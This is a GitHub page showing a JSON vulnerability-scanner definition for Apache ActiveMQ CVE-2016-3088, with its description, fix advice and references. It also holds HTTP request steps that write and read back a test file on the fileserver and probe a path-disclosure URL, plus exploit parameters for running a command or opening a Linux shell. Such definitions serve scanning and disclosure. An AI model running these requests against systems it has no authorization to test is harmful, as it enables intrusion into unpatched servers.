-
Notifications
You must be signed in to change notification settings - Fork 33
/
Copy pathActiveMQ-Arbitrary-File-Write-Vulnerability-(CVE-2016-3088).json
155 lines (155 loc) · 6.51 KB
/
ActiveMQ-Arbitrary-File-Write-Vulnerability-(CVE-2016-3088).json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
{
"Name": "ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)",
"Description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.",
"Product": "Apache-ActiveMQ",
"Homepage": "http://activemq.apache.org/",
"DisclosureDate": "2016-07-01",
"Author": "LubyRuffy",
"GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/ActiveMQ/CVE-2016-3088/CVE-2016-3088.gif",
"FofaQuery": "app=\"Apache-ActiveMQ\" && protocol!=activemq && protocol!=stomp",
"Level": "3",
"Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.",
"Recommendation": "Fileserver completely removed starting with 5.14.0 release. Users are advised to use other FTP and HTTP based file servers for transferring blob messages. Fileserver web application SHOULD NOT be used in older version of the broker and it should be disabled (it has been disabled by default since 5.12.0). This can be done by removing (commenting out) the following lines from conf\\jetty.xml file\n<pre>\n<bean class=\"org.eclipse.jetty.webapp.WebAppContext\">\n \n<property name=\"contextPath\" value=\"/fileserver\" />\n <property name=\"resourceBase\" value=\"${activemq.home}/webapps/fileserver\" />\n <property name=\"logUrlOnStart\" value=\"true\" />\n <property name=\"parentLoaderPriority\" value=\"true\" />\n</bean>\n</pre>",
"References": [
"https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet",
"http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt",
"http://rhn.redhat.com/errata/RHSA-2016-2036.html",
"http://www.securitytracker.com/id/1035951",
"http://www.zerodayinitiative.com/advisories/ZDI-16-356",
"http://www.zerodayinitiative.com/advisories/ZDI-16-357",
"https://lists.apache.org/thread.html/a859563f05fbe7c31916b3178c2697165bd9bbf5a65d1cf62aef27d2@%3Ccommits.activemq.apache.org%3E",
"https://lists.apache.org/thread.html/f956ea38e4da2e2c1e7131e6f91e41754852f5a4861d1a14ca5ca78a@%3Cusers.activemq.apache.org%3E",
"https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E",
"https://www.exploit-db.com/exploits/42283/",
"https://nvd.nist.gov/vuln/detail/CVE-2016-3088",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3088",
"https://www.exploit-db.com/exploits/40857"
],
"HasExp": true,
"ExpParams": [
{
"name": "AttackType",
"type": "select",
"value": "cmd,goby_shell_linux"
},
{
"Name": "cmd",
"Type": "input",
"Value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "PUT",
"uri": "/fileserver/g.txt",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": "^^^"
},
"ResponseTest": {
"type": "group",
"operation": "OR",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "204",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
}
},
{
"Request": {
"method": "GET",
"uri": "/fileserver/g.txt",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "OR",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "^^^",
"bz": ""
}
]
}
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/fileserver/%80/%80.txt",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": "^^^"
},
"ResponseTest": {
"type": "group",
"operation": "OR",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "204",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
}
}
],
"Tags": [
"rce"
],
"CVEIDs": [
"CVE-2016-3088"
],
"CVSSScore": "9.8",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}